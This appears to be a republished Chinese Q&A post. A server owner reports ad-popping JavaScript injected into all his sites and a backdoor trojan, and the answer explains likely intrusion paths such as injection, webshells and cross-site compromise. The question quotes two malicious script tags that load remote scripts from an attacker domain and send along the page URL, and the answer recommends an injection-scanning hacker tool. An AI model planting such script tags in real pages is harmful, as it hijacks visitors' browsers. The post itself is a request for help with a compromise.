問：

今日發現我服務器上所有站點打開皆有一段莫明其妙的廣告彈出，查看原文件讓我驚訝了，代碼中被植入了一段Js腳本<script src="http://iisa1.eyesir.net:7777/gethostjs.php" language="javascript"></script> ，
有時候會變成:

<script>var sUrl='http://www.eyesir.net:60000/ads.php?REFERER='+window.location;var _script = document.createElement('script');_script.setAttribute('type', 'text/javascript');_script.setAttribute('src', sUrl);document.getElementsByTagName('head')[0].appendChild(_script);</script>

仔細查看服務器上的web頁面沒有發現什么異常情況，文件修改日期也沒有更改過。 后來使用金山毒霸查了一遍，發現一個病毒木馬（C:\WINDOWS\system32\wswinds.dat Backdoor.IRC.Pangu.a），再訪問網站發現廣告消失 了，查看源碼那段異常代碼也消失了。后來發現在目錄C:\WINDOWS\system32下還有幾個異常文件wswinds.com 和perfc009.dat和perfh009.dat，我想也得把這干掉，否則會有麻煩哦。

通過金山清除之后當時發現已經好了,但是過幾天后又出現了,再用金山毒霸殺也沒有發現有任何異常現象.

但是截至目前位置還不知道這木馬是咋種上去的，有知情者麻煩告知我，我將感激不盡的。

?

答：

這是一種典型的掛馬，黑客將你的服務器攻陷后(有時甚至不用攻陷），通過修改你網站代碼，來達到抓肉雞，賺取點擊量或者其他什么目的。
首先，第一次出現的代碼是比較原始的窗口彈出（就是將"http://iisa1.eyesir.net:7777/gethostjs.php"中的廣告以窗口方式彈出）而第二次的代碼是經過修改的（實際上也是達到同樣的目的，但通過修改代碼，用等價代碼替換，可以繞過殺軟的查殺,但慶幸的是最后還是被查殺了）
要做到這個其實不難，這個黑客最有可能是通過注入，得到網站后臺密碼，再上傳木馬，得到webshell，在通過webshell來上傳修改過的網站源碼。另外，跨站方式也是有可能的，如果你的服務器有多個網站，黑客就可以通過別的網站來控制服務器，進而修改你的網站。還有其他方式比如弱口令等，但概率不大。
我推薦你一個黑客工具：啊D，你到網上搜一下，下載下來，可以用它來檢測你的網站是否有注入漏洞。
最后提醒你一句：自從出現了黑客，網站都沒有絕對安全。既然黑客已經入侵了你的服務器，說明你的網站絕對有漏洞，要盡快修補。還有，按照慣例，黑客入侵后一般會在服務器中留后門或是木馬（而且很有可能經過免殺，殺軟查不出來），你即使將剛才幾個東西刪除了，黑客還有可能卷土重來。最后，即將廣告代碼刪了，保不齊黑客還會在服務器中留其他掛馬語句（而且被修改的更變態，殺軟無法查出,或是這句掛馬語句不是用來彈窗的，而是用來植入木馬的，這種掛馬如果做得好根本沒有任何外在表現）
祝你好運。

總結

以上是生活随笔為你收集整理的(病毒安全)服务器被中了木马,如何清除的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。